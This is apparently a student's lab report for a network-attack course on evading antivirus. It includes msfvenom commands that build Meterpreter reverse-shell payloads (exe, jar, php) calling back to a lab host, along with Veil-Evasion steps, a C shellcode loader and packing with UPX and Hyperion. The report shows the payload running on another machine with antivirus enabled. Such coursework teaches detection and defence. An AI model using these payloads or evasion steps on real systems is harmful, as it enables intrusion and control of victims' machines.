2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

实验内容

  • 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)

  • 通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)

基础问题回答

1. 杀软是如何检测出恶意代码的?

  • 通过特征码:通过检索文件中是否包含恶意代码MAL里有并且其他软件没有的特征码。
  • 启发式:通过片面特征去判断。(不保证精确性)
  • 基于行为:通过对恶意代码的观察研究,发现某些特定的行为可能是恶意代码的行为。杀软在监视程序运行的过程中,如果发现了这些特殊行为,就会认为其是恶意软件。

2. 免杀是做什么?
通过一些特定的操作,使恶意代码不易被杀毒软件所发现。例如伪装,加密,对shellcode进行变形,利用veil进行重写重编译。

3. 免杀的基本方法有哪些?

  • 改变特征码
    • 只有EXE的情况下:加壳(压缩壳、加密壳)
    • 有shellcode的情况下:用encode进行编码,基于payload重新编译生成可执行文件。
    • 有源代码:用其他语言进行重写再编译。
  • 改变行为
    • 通讯方式:尽量使用反弹式连接、使用隧道技术、加密通讯数据。
    • 操作模式:基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码。
  • 非常规行为
    • 使用一个有漏洞的应用作为后门,编写攻击代码集成到如MSF中
    • 使用社工类攻击,诱骗目标关闭AV软件
    • 纯手工打造一个恶意软件

实践过程记录

任务一:正确使用免杀工具或技巧

1、 使用msf编码器,msfvenom生成如jar之类的其他文件。

msf编码器

Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度。理所当然,所有AV厂家都盯着呢,一有新编码算法,马上就得加到特征库里呀。
编码后呢,按理论上讲,编码会降低检出率,大不了多编码几次,总会检不出来。

  • 编码一次命令如下(用-e参数编码):
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.235.128 LPORT=5208 -f exe > met-encoded.exe
    image

  • 放去virscan扫描,28款杀软检测出了病毒。(注:由于学号涉及virscan的屏蔽词,所以检测文件名部分进行了更改)
    image

  • 编码十次命令如下(用-i参数指定编码次数):msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.235.128 LPORT=5208 -f exe > 20165208_back2.exe
    image

  • 再放去扫描,27款杀软检测出了病毒,效果不大
    image

jar文件
  • 生成.jar文件夹
    msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.235.128 lport=5208 x> 20165208_backdoor_java.jar
    image
  • 六款软件检测出了病毒,优秀!
    image
php文件
  • msfvenom生成php文件:
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.235.128 lport=5208 x> 20165208_backdoor.php
    image
  • 生成php文件后,只有一款软件查出了问题!出乎意料!
    image

2、使用veil-evasion

由于安装一直出现问题,在尝试几次无解后拷贝了同学的虚拟机。。。

  • 在终端中使用veil命令进入应用 > 输入use evasion进入veil-evasion
    image
    image

  • 然后设置回连IP(此处IP是kali)和端口,输入generate生成文件,接着输入你想要payload的名字:veil_c_5208
    输入use c/meterpreter/rev_tcp.py
    image

  • 设置反弹连接IP,命令为:set LHOST 192.168.235.128,注意此处的IP是KaliIP;

  • 设置端口,命令为:set LPORT 5208
    image

  • 输入generate生成文件,接着输入你想要playload的名字:veil_c_5208
    image
    image

  • 放去扫描,15款杀软检测出了病毒
    image

3、 半手工注入Shellcode并执行

  • 首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.128 LPORT=5208 -f c用c语言生成一段shellcode;
    image
  • 创建一个文件20165208.c,然后将unsigned char buf[]赋值到其中,代码如
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

image

  • 使用命令:i686-w64-mingw32-g++ 20165208.c -o 20165208.exe编译这个.c文件为可执行文件;
    image
  • 检测结果如下图,有13款杀软发现了问题
    image
  • 移到windows上执行该程序时,被电脑的360卫士查杀。
    image

4、 应用加壳工具


加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法,对shellcode进行再编码。

在技术上分壳分为:

  • 压缩壳(减少应用体积,如ASPack,UPX)
  • 加密壳(版权保护,反跟踪。如ASProtect,Armadillo)
  • 虚拟机(通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect,Themida)
使用压缩壳(UPX)
  • 给之前的20165208.exe加个壳得到ky_upxed.exe:
    image
  • 扫描一下,16款软件发现了问题
    image
使用加密壳(Hyperion)
  • 进入目录 /usr/share/windows-binaries/hyperion/中;
  • 输入命令wine hyperion.exe -v ky.upxed.exe ky.upxed.Hyperion.exe进行加壳:
    image
  • 再去扫一遍,更多了。。。
    image

任务二:通过组合应用各种技术实现恶意代码免杀

  • 通过组合半手工制作shellcode,压缩壳,加密壳达到了免杀的目的
  • 任务截图如下:
    image
    image

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

注意:由于换了网络,IP地址会发生变化,shellcode一定要重新生成!!!

免杀方法:先用msfvenom生成shellcode,再使用压缩壳加壳。
实验环境:对方电脑为 win7主机,腾讯电脑管家13.0.19837.233
image

开启杀软能绝对防止电脑中恶意代码吗?

不能!!!!!你看实验中仅仅做到UNX加壳,49款软件中就只有1款发现了它。

但是在实验中我们注意到360杀毒这个流氓软件云上传这个功能也是相当狂拽酷炫了。。。起初我们的UPX加壳完全木得问题,但是我们没有关云计划。。。然后我们看到了这个。。。
image
然后第一次我们运行还是会被免杀的UNX文件,第二次就凉了。。。。

实验中遇到的问题及解决方法

1、实验中不止一次出现了虚拟机IP地址显示为127.0.0.1的情况,无法ping通也无法上网。
image
解决方法:实验最初出现了这个问题,考虑到可能是在做另一门实验对VMware虚拟机网络进行了设置,查了下网上的解决方法。
image

不过很遗憾没有成功,后来我又尝试了自己对桥接、NAT模式进行了设置,也没有效果。。。于是选择了还原默认设置,在进行重启。
image
第一次的问题解决了。
image
不过在我和同学的虚拟机打算相连时,又一次的出现了上述的问题。我按照之前的操作步骤来不好使了。后来是在将网络设置改成Nat模式重启,再转为桥接模式!!!!一定要注意这个时候不要重启!!!然后就可以了。心疼无数次重启无数次失败的自己。。。

实验总结与体会

本次实验通过利用一些工具实现了病毒的免杀,不得不说我在看到转换为php文件后就只有一款杀毒软件发现了它的时候我是震惊的!!!不过在我的主机上php文件没有找到可以打开的方式。除此之外在学习其他免杀方法时,我尝试了捆绑压缩并隐藏,虽然失败了,但是也是头一次发现了压缩包还可以有这么多设置,以后解压缩文件也不是很放心了。

听了这么多节课,也做了好多次实验,我发现对于计算机水平不错的人来说,编写个病毒真的是很容易了,而且我想象中的杀软也会有漏洞,感觉之前会觉得不容易碰到的木马病毒,其实不需要什么功夫就可以入侵你的电脑了。所以我们除了基础防范,一定要在官方渠道下载软件,即时更新杀软版本,病毒库的更新真的很主要。

posted @ 2019-03-31 09:26  KY-high  阅读(307)  评论(0编辑  收藏  举报